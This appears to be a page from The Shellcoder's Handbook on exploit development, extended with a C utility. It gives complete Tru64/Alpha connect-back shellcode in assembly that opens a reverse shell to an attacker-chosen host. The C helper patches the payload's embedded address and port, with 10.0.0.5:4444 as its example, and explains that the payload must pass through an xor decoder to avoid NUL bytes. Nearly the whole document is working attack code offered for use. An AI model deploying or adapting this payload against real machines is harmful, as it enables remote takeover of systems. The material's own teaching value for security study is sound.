Connect-Back Shellcode

Let's take a look at some classic connect-back shellcode for Tru64 on Alpha. The following shellcode connects from the compromised host back to an attacker-chosen machine on a given TCP port, duplicates the connected socket over the stdio descriptors (stderr, stdout and stdin) with dup2, and executes the shell interpreter, giving the attacker an interactive, telnet-like session. The listing is position-independent relative to a0: it expects to be entered with its own address in a0 (which the xorloop decoder it is paired with arranges) and finds its embedded sockaddr_in and the "//bin/sh" string at fixed offsets from that address (0x70 and 0x88; the 28 instructions occupy exactly 0x70 bytes). As listed, the sockaddr_in is hard-wired to 127.0.0.1:8080 (0x901f0002 is AF_INET followed by port 0x1f90 in network byte order), so the two data words at offset 0x70 are what you overwrite to retarget it. The numbers loaded into v0 are Tru64 syscall numbers (socket 0x61, connect 0x62, dup2 0x5a, execve 0x3b). Note that the payload contains null bytes, both in the zero-filled data words and in the call_pal encodings, which is why it is meant to be carried inside the decoder rather than injected raw through a string-copy overflow.

 #include <alpha/regdef.h>
 #include <alpha/pal.h>

     .text
     .arch     generic
     .align 4
     .globl  main
     .ent      main
 main:
     .frame  $sp, 0, ra       #no frame; return address register is ra

                              #148 bytes total size.
                              #xorloop will give us the pc in a0
                              #a0-a2: syscall args, v0: syscall number / return value,
                              #s0-s4: callee-saved, survive the syscalls.

     bic  sp, 0xf, sp     #make sure the stack is 16 byte aligned.
     addq a0, 0x70, s1    #address of sockaddr_in. s1 preserved
     addq a0, 0x88, s4    #address of //bin/sh

     stq  s4, (sp)        #store address of //bin/sh (argv[0])
     stq  zero, 8(sp)     #argv[1] = NULL

     mov  0x2, a0         #AF_INET
     mov  0x1, a1         #SOCK_STREAM
     bis  zero, zero, a2  #0 (protocol)
     addq zero, 0x61, v0  #socket syscall
     PAL_callsys
     mov  v0, s0          #saved register, preserved. store socket number.

     mov  s0, a0          #socket number
     mov  s1, a1          #addr of sockaddr_in
     mov  0x10, a2        #sizeof sockaddr_in equals 16
     addq zero, 0x62, v0  #connect syscall
     PAL_callsys

     mov  0x2, s2         #descriptor counter, starts at stderr
 duploop:
     mov  s0, a0          #socket number.
     mov  s2, a1          #stdin, stdout, stderr.
     addq zero, 0x5a, v0  #dup2 syscall.
     PAL_callsys
     subq s2, 0x1, s2     #decrement the counter.
     bge  s2, duploop     #loop for 2,1,0 (stderr, stdout, stdin).

     mov  s4, a0          #address of //bin/sh
     mov  sp, a1          #address of (address of //bin/sh), i.e. argv
     bis  zero, zero, a2  #NULL envp
     addq zero, 0x3b, v0  #execve syscall
     PAL_callsys

     .long   0x901f0002   #sin_family AF_INET, sin_port 0x1f90 = 8080 (network byte order)
     .long   0x0100007f   #sin_addr 127.0.0.1
     .long   0x00000000   #sin_zero
     .long   0x00000000
     .long   0x10
     .long   0x00000000
     .quad   0x68732f6e69622f2f   #"//bin/sh" (little-endian bytes)
     .long   0x00000000           #terminating NUL for the string
     .end        main
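The following helper, added here as an example and not taken from The Shellcoder's Handbook or the page above, shows how the hard-wired 127.0.0.1:8080 target is encoded in the listing's data tail and how to retarget it. It relies only on layout facts visible in the listing (148-byte payload, sockaddr_in at offset 0x70 consisting of a 16-bit sin_family, a 16-bit network-order sin_port and the four address octets) and on the little-endian byte order of Alpha. The function names (sockaddr_head_word, ip_word, patch_target, read_target) are this example's own, and the payload buffer built in main() is a constructed stand-in that carries only the data tail, not the assembled instructions. Because the patched words may contain NUL bytes, patch_target reports how many it introduced so you know whether the payload still has to go through the xor decoder.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Layout facts taken from the listing. */
#define PAYLOAD_LEN   148                 /* "148 bytes total size" */
#define SOCKADDR_OFF  0x70                /* addq a0, 0x70, s1 -> sockaddr_in */
#define SIN_ADDR_OFF  (SOCKADDR_OFF + 4)  /* sin_addr follows family + port */
#define AF_INET_TRU64 2                   /* mov 0x2, a0 before the socket call */

/* First sockaddr_in word: sin_family in the low 16 bits, sin_port in the
 * high 16 bits. The port is stored in network (big-endian) order, so seen as
 * a little-endian word its two bytes are swapped: 8080 = 0x1f90 -> 0x901f0002. */
uint32_t sockaddr_head_word(uint16_t port)
{
    uint32_t port_be = (uint32_t)((port & 0xffu) << 8) | (uint32_t)(port >> 8);
    return (port_be << 16) | AF_INET_TRU64;
}

/* Second word: sin_addr. The octets a.b.c.d sit in memory in that order,
 * which as a little-endian word is d<<24 | c<<16 | b<<8 | a
 * (127.0.0.1 -> 0x0100007f). Returns 1 on success, 0 if not a dotted quad. */
int ip_word(const char *dotted, uint32_t *out)
{
    unsigned a, b, c, d;
    char extra;
    if (sscanf(dotted, "%u.%u.%u.%u%c", &a, &b, &c, &d, &extra) != 4)
        return 0;
    if (a > 255 || b > 255 || c > 255 || d > 255)
        return 0;
    *out = a | (b << 8) | (c << 16) | (d << 24);
    return 1;
}

static void put_le32(uint8_t *p, uint32_t v)
{
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = v >> 24;
}

static uint32_t get_le32(const uint8_t *p)
{
    return p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Overwrite the embedded target. Returns the number of NUL bytes now present
 * in the 8-byte family/port/address prefix (sin_family alone contributes one),
 * or -1 on a malformed address or a too-short buffer. Any non-zero count means
 * the payload still needs the xor decoder in front of it. */
int patch_target(uint8_t *payload, size_t len, const char *ip, uint16_t port)
{
    uint32_t addr;
    int nuls = 0;
    size_t i;
    if (len < PAYLOAD_LEN || !ip_word(ip, &addr))
        return -1;
    put_le32(payload + SOCKADDR_OFF, sockaddr_head_word(port));
    put_le32(payload + SIN_ADDR_OFF, addr);
    for (i = SOCKADDR_OFF; i < SOCKADDR_OFF + 8; i++)
        if (payload[i] == 0)
            nuls++;
    return nuls;
}

/* Decode the target back out of a payload, to check a patched buffer.
 * ip must have room for 16 bytes. Returns 1 on success, 0 if the buffer is
 * too short or sin_family is not AF_INET. */
int read_target(const uint8_t *payload, size_t len, char ip[16], uint16_t *port)
{
    uint32_t head, addr;
    if (len < PAYLOAD_LEN)
        return 0;
    head = get_le32(payload + SOCKADDR_OFF);
    if ((head & 0xffff) != AF_INET_TRU64)
        return 0;
    *port = (uint16_t)((((head >> 16) & 0xff) << 8) | (head >> 24));   /* ntohs by hand */
    addr = get_le32(payload + SIN_ADDR_OFF);
    snprintf(ip, 16, "%u.%u.%u.%u", (unsigned)(addr & 0xff), (unsigned)((addr >> 8) & 0xff),
             (unsigned)((addr >> 16) & 0xff), (unsigned)(addr >> 24));
    return 1;
}

int main(void)
{
    /* Constructed stand-in for the payload: zero-filled, with only the data
     * tail from the listing present (the first 0x70 bytes would be code). */
    uint8_t payload[PAYLOAD_LEN];
    char ip[16];
    uint16_t port;
    int nuls;
    memset(payload, 0, sizeof payload);
    put_le32(payload + 0x70, 0x901f0002);          /* AF_INET, port 8080 */
    put_le32(payload + 0x74, 0x0100007f);          /* 127.0.0.1 */
    memcpy(payload + 0x88, "//bin/sh", 8);         /* .quad 0x68732f6e69622f2f */

    read_target(payload, sizeof payload, ip, &port);
    printf("listing targets %s:%u\n", ip, port);
    nuls = patch_target(payload, sizeof payload, "10.0.0.5", 4444);
    read_target(payload, sizeof payload, ip, &port);
    printf("patched to %s:%u, words %08x %08x, %d NUL bytes in sockaddr_in\n",
           ip, port, get_le32(payload + 0x70), get_le32(payload + 0x74), nuls);
    return 0;
}
```

Run against a real assembled copy of the listing, patch_target would be applied to the 148-byte buffer before the xor encoder runs over it; the NUL count it returns is the reason that encoding step cannot be skipped for most targets, since sin_family alone always places a zero byte at offset 0x71.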


From The Shellcoder's Handbook: Discovering and Exploiting Security Holes.

flylib.com © 2008-2017.